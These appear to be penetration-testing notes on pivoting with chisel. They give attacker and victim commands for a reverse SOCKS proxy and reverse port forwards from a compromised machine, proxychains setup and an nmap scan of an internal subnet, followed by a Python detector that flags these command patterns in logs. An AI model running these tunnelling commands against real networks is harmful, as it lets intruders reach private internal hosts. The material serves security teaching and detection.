Pivoting

Chisel

Start a server on the attacker machine, listening for a connection on port 1234. The default port is 8080 if -p is not specified. The --reverse flag lets clients set up reverse tunnels, so the victim (client) can open a port on the attacker machine (server).

./chisel server -p 1234 --reverse

Transfer chisel to the compromised machine and run it as a client. This creates a reverse proxy and opens port 1080 (SOCKS) on the attacker machine.

./chisel client server_IP:1234 R:socks

In the /etc/proxychains.conf file, append:

socks5 127.0.0.1 1080

You can now run commands from the attacker machine using proxychains.

proxychains4 nmap 10.14.1.0/24

To access another machine on the client's internal network, use a reverse port forward. It opens a listener on port 80 on the server; connections to that port are forwarded to the client and then on to the other machine in the client's network.

//Attacker
./chisel server -p 8000 --reverse

//Victim
./chisel client [server_IP]:8000 R:80:[client_side_internal_ip]:80
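
From the defender's side, the commands above leave a recognisable argument pattern in process-creation logs. The following is an added example, not part of the original notes or of the chisel project: it flags the server and client invocations shown on this page, assuming the log source records full command lines; the sample lines, addresses and file paths are constructed.

```python
import shlex

# Constructed process-creation command lines (e.g. taken from auditd execve
# or Sysmon Event ID 1 records); addresses and paths are placeholders.
SAMPLE_CMDLINES = [
    "./chisel server -p 1234 --reverse",
    "./chisel client 203.0.113.5:1234 R:socks",
    "/opt/tools/chisel_linux_amd64 client 203.0.113.5:8000 R:80:10.14.1.20:80",
    "/usr/bin/ssh -p 1234 admin@203.0.113.5",
]


def parse_reverse_remote(spec):
    """Parse the two reverse remote forms used on this page; None otherwise."""
    if not spec.startswith("R:"):
        return None
    parts = spec[2:].split(":")
    if parts == ["socks"]:
        # 1080 is the listener port the page gives for R:socks.
        return {"kind": "reverse-socks", "listen_port": 1080}
    if len(parts) == 3 and parts[0].isdigit() and parts[2].isdigit():
        return {"kind": "reverse-forward", "listen_port": int(parts[0]),
                "target": f"{parts[1]}:{parts[2]}"}
    return None  # other remote forms (IPv6, 4-part) are out of scope here


def classify(cmdline):
    """Return a finding for chisel-style tunnel arguments, else None.

    Matching is on argument shape rather than the executable name, because
    the binary on disk is not always called "chisel".
    """
    argv = shlex.split(cmdline)
    if len(argv) < 2:
        return None
    mode, args = argv[1], argv[2:]
    if mode == "server" and "--reverse" in args:
        return {"role": "server", "reverse_enabled": True}
    if mode == "client" and args:
        remotes = [r for r in map(parse_reverse_remote, args) if r]
        if remotes:
            # Assumes the page's layout: server address right after "client".
            return {"role": "client", "server": args[0], "remotes": remotes}
    return None


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(line, "->", classify(line))
```

A client finding names the external server and, for a reverse forward, the internal host and port being exposed, which is the scoping information an incident responder needs first.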
